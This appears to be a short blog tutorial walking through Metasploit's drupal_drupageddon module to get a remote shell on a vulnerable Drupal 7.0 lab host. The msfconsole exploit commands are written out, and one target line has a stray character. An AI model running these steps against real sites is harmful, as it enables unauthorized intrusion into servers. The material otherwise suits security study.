Hack Drupal Website Server using Drupal HTTP Parameter Key/Value SQL Injection

Datetime:2016-08-23 00:16:08          Topic: SQL Injection           Share

This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).

  Exploit Targets

Drupal 7.0

Requirement

Attacker: kali Linux

Victim PC: Drupal 7.0

Open Kali terminal type  msfconsole

Now type  use exploit/ multi/http/drupal_drupageddon

msf exploit( drupal_drupageddon )> set targeturi /drupal/

msf exploit( drupal_drupageddon )> set rhost 192.168.0.10 9 (IP of Remote Host)

msf exploit( drupal_drupageddon )> set rport 80

msf exploit ( drupal_drupageddon )> exploit            





About List